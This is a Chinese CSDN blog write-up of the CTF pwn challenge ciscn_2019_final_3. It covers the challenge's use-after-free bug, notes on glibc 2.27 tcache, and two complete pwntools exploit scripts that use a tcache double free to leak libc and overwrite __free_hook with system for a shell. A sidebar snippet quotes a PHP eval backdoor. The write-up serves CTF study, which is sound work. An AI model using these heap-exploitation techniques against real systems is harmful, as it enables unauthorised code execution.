buuoj刷题记录 - ciscn_2019_final_3

已于 2022-03-25 22:01:28 修改
阅读量452 收藏
点赞数
分类专栏: pwn入门 文章标签: 安全
于 2022-03-25 21:48:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34010404/article/details/123745418
版权

看了大佬们的思路才做出来的,这里只记录一下做题中踩的坑。

1.add函数
在这里插入图片描述
2.del函数
在这里插入图片描述
free后没有把数组元素标记为0,存在UAF漏洞.
思路是:1.double free 改fd 到 另一个chunk 的首地址处,然后修改chunksize ,原因是程序限制了分配大小为120字节,free到unsorted bin里面。
2.free chunk 到unsorted bin里面
3.double free 修改fd 到第二步中的chunk,之后便可以malloc 到unsorted bin处,然后泄露libc
4.继续利用double free改fd到free_hook,改为system即可。

1.tcache bin的一些注意事项:
与size有关的一些:

		有64个bin	, 每个bin里面最多有7个 chunk
		每个bin 的chunk 大小(向下取整 ,& ~(0xf)):
			0x20,0x30,.........0x400,0x410 
		0x413,0x415...之类的size ,在向下取整对齐后也是属于0x410的
		要想使chunk不进入tcache bin,就要满足:
		对应bin里面已经有7个chunk,或者该chunk 的size >= 0x420	
		还有一点要注意count 数组 是无符号的, 0的时候还可以get一个,但是变成 -1 后就无法put 了.

安全检查:

typedef struct tcache_entry
{
  struct tcache_entry *next;          //只有一个成员,下一个chunk的地址+prev_size + cur_size ,
                                      //2.31新增了 key 用于double free check.
} tcache_entry;

glibc 2.27里面的tcache_entry只有一个next指针,2.31里面还有一个key 用于检查double free.
2.27 没有double free的检查,随便搞就可以了

2.fastbin
默认最大chunk 是0x80 (向下取整对齐后的结果),必须使Chunk 的 size >= 0x90 才能丢到unsorted bin里面.

3.注意free chunk的时候会检查下一个chunk的大小.

exp:

from pwn import*
#sh = process('./pwn')
sh = remote('node4.buuoj.cn',29672)

def add(idx,size,payload):
    sh.sendlineafter(b'2. remove\n',b'1')
    sh.sendlineafter(b'input the index',str(idx).encode())
    sh.sendlineafter(b'input the size',str(size).encode())
    sh.sendlineafter(b'now you can write something',payload)
    sh.recvuntil(b'gift :')
    return int(sh.recvline()[:-1],16)

def free(idx):
    sh.sendlineafter(b'2. remove\n',b'2')
    sh.sendlineafter(b'input the index',str(idx).encode())

#泄露libc
#0x20
add(0,0x10,b'emmm')     #double free.

#0x421

nextchunk = add(1,0x10,'emmm') - 0x10
for i in range(8):
    add(2+i,0x70,'emmm')
#阻止合并到top chunk
add(11,0x10,'emmm')
#
log.success('next chunk %x',nextchunk)

free(0)
free(1)
free(0)
free(1)
#
add(12,0x10,p64(nextchunk))
add(13,0x10,'emm')
add(14,0x10,'emm')
add(15,0x10,p64(0) + p64(0x421))
#
free(1)     #-->unsorted bin

# #
free(11)
free(0)
free(11)
free(0)
free(11)


add(16,0x10,p64(nextchunk + 0x10))
add(17,0x10,'emm')
add(18,0x10,'emm')
add(19,0x10,'emm')


libc_base = add(20,0x10,'\x00') - 0x3ebca0
system = libc_base + 0x4f440
free_hook = libc_base + 0x3ed8e8

log.success('libc_base :%x ',libc_base)

free(0)
free(11)
free(0)
free(11)

add(21,0x10,p64(free_hook))
add(22,0x10,b'/bin/sh')         #22
add(23,0x10,b'emm')
add(24,0x10,p64(system))

#gdb.attach(sh)
sh.interactive()

做这道题的时候我以为tcache bin会检测出连续两个chunk 的double free. 刚才又看了一下源码才发现没有这个检查.

修改了一下exp:

from pwn import*
sh = process('./pwn')
#sh = remote('node4.buuoj.cn',29672)

def add(idx,size,payload):
    sh.sendlineafter(b'2. remove\n',b'1')
    sh.sendlineafter(b'input the index',str(idx).encode())
    sh.sendlineafter(b'input the size',str(size).encode())
    sh.sendlineafter(b'now you can write something',payload)
    sh.recvuntil(b'gift :')
    return int(sh.recvline()[:-1],16)

def free(idx):
    sh.sendlineafter(b'2. remove\n',b'2')
    sh.sendlineafter(b'input the index',str(idx).encode())

#泄露libc
#0x20
add(0,0x10,b'emmm')     #double free.

#0x421

nextchunk = add(1,0x10,'emmm') - 0x10
for i in range(8):
    add(2+i,0x70,'emmm')
#阻止合并到top chunk
add(11,0x10,'emmm')
#
log.success('next chunk %x',nextchunk)

free(0)
free(0)
free(0)
#
add(12,0x10,p64(nextchunk))
add(13,0x10,'emm')
add(14,0x10,p64(0) + p64(0x421))
#
free(1)     #-->unsorted bin

#gdb.attach(sh)

# 修改fd 到unsorted bin
free(0)
free(0)
free(0)
free(0)

#
add(16,0x10,p64(nextchunk + 0x10))
add(17,0x10,'emm')
add(18,0x10,'emm')
libc_base = add(19,0x10,'\x00') - 0x3ebca0
system = libc_base + 0x4f440
free_hook = libc_base + 0x3ed8e8

log.success('libc_base :%x ',libc_base)

#gdb.attach(sh)
free(0)
free(0)
free(0)

add(20,0x10,p64(free_hook))
add(21,0x10,b'/bin/sh')
add(22,0x10,p64(system))

sh.interactive()
Suspend.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
code-1_touch_switch_final_android_
10-04
【标题】"code-1_touch_switch_final_android_" 指的可能是一个Android应用程序项目,它涉及到使用触摸开关功能。在Android开发中,触摸事件处理是关键部分,允许用户通过触摸屏幕来与应用交互。这个项目可能是一个...
buu刷题ciscn_2019_final_3
m0_73756460的博客
03-18 367
buu刷题ciscn_2019_final_3 write up
[BUUCTF]PWN——ciscn_2019_final_3(tcache dup)
mcmuyanga的博客
03-10 1040
ciscn_2019_final_3 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,提示是堆题 64位ida载入 add() remove() 简单的思路:先合并堆块,合并后的堆块大于tcache的范围,然后free掉即可出现libc,接下来就是堆块重叠malloc一个堆块到libc空间,通过gift得到libc地址,接着tcache attack修改__free_hook拿到shell tcache 第一次接触tcache,根据ctfwiki上的知识点简单总结一
ciscn_2019_final_3
z1r0的博客
12-29 440
ciscn_2019_final_3 查看保护 uaf。 在add时,会给出data区域的地址,理解为fd就行。 2.27有tcache用unstortdbin来泄露需要有一个size大于0x400的chunk。这里借助double free(dup)和uaf改size。达到条件释放,即可有unstorted bin了。 泄露出libc还是用double free + uaf即可申请到hook。具体2.27下的double free(dup)看z1r0’s blog from pwn import *
BUU刷题(三)
playmaker的博客
03-13 1004
BUU刷题(三) fm from pwn import * context.log_level='debug' p=process('./fm') p=remote("node3.buuoj.cn","27782") payload=p32(0x0804a02c)+'%11$n' p.sendline(payload) p.interactive() others_shellcode 拿到题目直...
jboss-websocket-api_1.1_spec-2.0.0.Final-API文档-中英对照版.zip
07-13
赠送原API文档:jboss-websocket-api_1.1_spec-2.0.0.Final-javadoc.jar; 赠送源代码:jboss-websocket-api_1.1_spec-2.0.0.Final-sources.jar; 赠送Maven依赖信息文件:jboss-websocket-api_1.1_spec-2.0.0.Final...
jboss-annotations-api_1.3_spec-2.0.1.Final-API文档-中英对照版.zip
07-13
赠送原API文档:jboss-annotations-api_1.3_spec-2.0.1.Final-javadoc.jar; 赠送源代码:jboss-annotations-api_1.3_spec-2.0.1.Final-sources.jar; 赠送Maven依赖信息文件:jboss-annotations-api_1.3_spec-2.0.1...
netty-transport-native-epoll-4.1.15.Final-linux-x86_64.jar
02-26
java运行依赖jar包
jboss-transaction-api_1.2_spec-1.0.1.Final.jar
02-25
java运行依赖jar包
[Buuoj刷题]ciscn_2019_final_3 tcache attack
zylxixixi的博客
10-09 318
Tcache机制的引入 libc2.26以后引入了一个新的机制tcache,类似于fastbin,每条链上允许有7个chunk,多出的chunk会直接放入相应的fastbin或者Unsortedbin,跟以往不同的是,当用户申请chunk时,会优先寻找tcache中的chunk。 因为该机制的引入,提升了处理的速度,但安全性减低了,例如fastbin attach中的double free(tcache dup),free的时候会检查第一个chunk是否为自己,绕过该机制需要构造a->b->
我要学pwn.day10
weixin_45963786的博客
07-14 210
ciscn_2019_n_8 潜心修炼,从基础开始 简单的pwntools使用 解题流程 1.查看文件 $ file ciscn_2019_n_8 ciscn_2019_n_8: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=44b5b2d71c377819ef3c53a4511038cd2b25a
BUUCTF-web极客大挑战
zhhhb1005的博客
04-17 3728
目录 [极客大挑战 2019]Knife [极客大挑战 2019]Http [极客大挑战 2019]Upload ​ [极客大挑战 2019]PHP [极客大挑战 2019]Knife eval($_POST["Syc"]); 这是一个典型的后门程序,用蚁剑链接复制url,密码则是页面中给的密码Syc。 在根目录下找到flag文件,得出flag。 [极客大挑战 2019]Http 打开页面后查看源代码,发现一个php文件 打开链接node4.buuoj..
buuoj Pwn writeup 286-290
yongbaoii的博客
09-06 242
286 metasequoia_2020_blacksmith 287 secretHolder_hitcon_2016 288 pwnable_dubblesort 289 pwnable_applestore 290 xp0intctf_2018_tutorial1
[BUUCTF]-PWN:ciscn_2019_final_3解析(tcache dup)
最新发布
2301_79326813的博客
02-15 439
查看保护RELRO保护为FULL,got表不可修改,只能修改hook表了查看ida这里的大致功能为alloc创建堆块(可填充内容)、free释放堆块(但是不清空指针)值得注意的就是创建堆块大小不可以超过0x78(实际大小会对齐)
BUU刷题记录(四)
山高路远
04-12 493
以下几题的ciscn是我先抽出来做的,因为不久就是ciscn,所以看看之前的题目,先不按顺序 十七、ciscn_2019_n_3 照例checksec一下 开启了nx和canary,relro只开启部分,可以修改got表(后面没用到就是了) 进入ida看看反汇编代码 总共有着四个功能,第一个new note: 在第一个功能里面,可以创建一个堆,堆里面第一个存放的是printf函数指针,第二存放了一个free函数指针,第三个存放有区别,当type==1,存放的是一个数据,type ==2,存放的是字符串
buuoj刷题笔记
q1415500189的博客
01-22 896
buuoj
[V&N2020 公开赛]easyTHeap + ciscn_2019_final_3 ——heap中tcache的一些简单利用方法
PLpa的博客
06-06 1094
在libc2.26之后的libc版本中加入了新的存储结构tcache,这使得我们利用堆的时候要特别注意libc版本。 对tcache不是很了解建议看看CTFWiKi 1.[V&N2020 公开赛]easyTHeap 保护全开,libc2.27版本,进入IDA 看到程序有增删改查的功能。 我们一个个来看: add: 我们可以看到add中不能写入数据。 edit: add中不能读入的数据由edit来读入。 show: 没什么特殊的,就是输出数据,这里我们可以用其来查看我们泄露的地址。 dele
BUUCTF-PWN刷题记录-5(Tcache)
weixin_44145820的博客
04-13 1456
目录ciscn_2019_final_3[V&N2020 公开赛]easyTHeap ciscn_2019_final_3 只有添加和删除两个功能 限制了申请的大小,最大为0x78,意味着chunk最大为0x80,添加完可以泄露堆上的地址 free之后没有置空,可以double free 题目分析差不多就这样,下面是漏洞利用: 先申请一个大小为0x78的heap[0],记录下返回地...
8_pci_firmware_v3.2_01-26-2015_ts_clean_firmware_final.pdf
05-14
这是一个版本为3.2的PCI固件文件,创建于2015年1月26日,名称为“ts_clean_firmware_final.pdf”。 PCI代表“外围组件互联”,是一种计算机总线标准。固件是一种硬件设备的软件程序,在设备运行时起到控制和管理的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Suspend.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值